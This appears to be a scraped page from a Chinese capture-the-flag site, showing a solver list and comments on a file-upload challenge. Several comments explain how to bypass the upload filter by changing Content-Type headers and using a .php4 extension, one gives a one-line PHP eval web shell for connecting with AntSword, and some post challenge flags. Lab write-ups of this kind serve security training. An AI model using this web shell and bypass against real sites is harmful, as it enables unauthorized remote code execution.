评分(17)
解题动态
![](/static/images/face.webp)
15261347711 攻破了该题 12小时前
![](/static/images/face.webp)
随缘 攻破了该题 22小时前
![](/static/images/face.webp)
Nan123 攻破了该题 1天前
![](/static/images/face.webp)
zayxshawn 攻破了该题 1天前
![](/static/images/face.webp)
AFIFI 攻破了该题 2天前
![](/static/images/face.webp)
死在回忆里 攻破了该题 3天前
![](/static/images/face.webp)
爱屯粮的仓鼠 攻破了该题 4天前
![](/upload/user/20240718/a119638564e3ca270d1456696e777bf7.webp)
XmN<=GzR 攻破了该题 8天前
![](/static/images/face.webp)
ysqhhhhh 攻破了该题 8天前
![](/static/images/face.webp)
tommyxy 攻破了该题 9天前
![](/upload/user/20220914/145c5b00460304817c1362c1bf971cf1.gif)
1047848082 攻破了该题 10天前
![](/upload/user/20230409/7c2a2b7b8ddf01db2a4980b9aff4a189.webp)
Marionette 攻破了该题 10天前
![](/static/images/face.webp)
fengyao 攻破了该题 10天前
![](/static/images/face.webp)
erha 攻破了该题 10天前
![](/static/images/face.webp)
likewp 攻破了该题 11天前
![](/static/images/face.webp)
q1152874733 攻破了该题 12天前
![](/static/images/face.webp)
mk012 攻破了该题 15天前
![](/static/images/face.webp)
endual 攻破了该题 15天前
![](/static/images/face.webp)
cyhstyle 攻破了该题 17天前
![](/upload/user/20240706/9806cc9b048010dbb732ce82999da57e.webp)
评论
合肥徐总 1月前
举报
123.php.gif contenttype image/gif
jingquesec 2月前
举报
flag{01b6ad6be2af70f83f2c9282ad8d34c1}
Wchzzz 4月前
举报
怎么连上去打不开flag啊
1004025151 4月前
举报
flag{de5fd002182dd65121054872ac5570f0}
冯飞99 8月前
举报
这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁?直接连接,记得把代理关掉,不然不成功。
zzccbb2005 8月前
举报
1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录
wjx2958958 8月前
举报
这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了
ACHEN8899 8月前
举报
蚁剑连不上是什么原因啊?
XRain 10月前
举报
黑盒测出来也是有可能的,就是在请求头里面改改改,然后仔细观察返回的信息有什么差别。
XRain 10月前
举报
其实, php 后缀的检测机制跟其他后缀如 txt 的不一样,这点是能测出来的,因为 php、php1 和 1php 这些后缀都是返回 invalid file,像 txt、aaa 这种就返回 give me a image file not a php。所以,包含 php 的检测至少用了 strpos() 做判断。我也只测到这种程度,修改 Content-Type 真想不到。